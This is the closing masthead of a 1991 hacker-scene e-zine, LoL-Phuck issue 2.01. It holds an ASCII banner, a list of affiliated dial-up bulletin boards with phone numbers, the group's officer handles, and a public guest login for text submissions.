  909. ==============================================================================
  910. ##############################################################################
  911.     ##      #######  ##            ######  ##   ##  ##   ##  ######   ##  ##
  912.    ##      ##   ##  ##     ####   ##  ##  #######  ##   ##  ##       ## ##
  913.   ##      ##   ##  ##            ######  ##   ##  ##   ##  ##       #####
  914.  ######  #######  #######       ##      ##   ##  #######  #######  ##   ##
  915. ##############################################################################
  916. ------------------------------------------------------------------------------
  917.      (L)egions (o) (L)ucifer - (P)hone (H)ackers (U)nited (C)rash (K)ill
  918. ------------------------------------------------------------------------------
  919. Call these LoL-Phuck support boards for information or application
  920. inquiries:
  921.  
  922. UNITED STATES:
  923. The Disconnected System        602/997+9918  Arizona         NSA Dist Site
  924. West Coast Technologies, Inc.  213/274+1333  California      AfterShock Beta
  925. The Magical Mystery Board      203/TMP+DOWN  Connecticut     THG Dist Site
  926. Blitzkrieg BBS <Node 1>        502/499+8933  Kentucky        TAP Magazine HQ
  927. Blitzkrieg BBS <Node 2>        502/491+5198  Kentucky        TAP Magazine HQ
  928. Free Speech BBS                618/457+3365  Illinois        PHRACK Classic HQ
  929. Gonzo's Gabanza                513/890+0655  Ohio            CHUD Dite Site
  930.  
  931. EUROPE/OUTSIDE CONTINENTAL NORTH AMERICA:
  932. Interpol II                  +46-8-PR-IVAT  Sweden           SHA HQ
  933. ==============================================================================
  934. Legions of Lucifer-Phuck High Office Staff Member
  935.  
  936. Prezident of [L.o.L]       : Digitone Cypher
  937. Prezident of [Phuck]       : Tripin Face (aka Cobra Commander)
  938. Out of US Representatives  : Mr Big          -=-  Sweden
  939.  
  940. ==============================================================================
  941.     Legions of Lucifer - Phone Hackers United to Crash & Kill  < LoL-Phuck >
  942.             LoL-Phuck, Inc. / Issue Number 2.01  08.29.1991 Complete
  943.            (C)Copr 1990,91 Cypher Productions - All rights reserved.
  944. ------------------------------------------------------------------------------
  945.                      All text file submissions should go to:
  946.                  West Coast Technologies, Inc. @ +1-213-274-1333
  947.            (Use the guest account; User Name: GUEST  Password: GUEST)
  948. ------------------------------------------------------------------------------
  949. ______________________________________________________________________________
  950. ==============================================================================
  951. ==============================================================================
  952.               - Digitone Cypher (Main Editor/Layout/President)
  953. ==============================================================================
  954. 456835454/021491-0202
  955.  
  956. Downloaded From P-80 International Information Systems 304-744-2253 12yrs+
  957.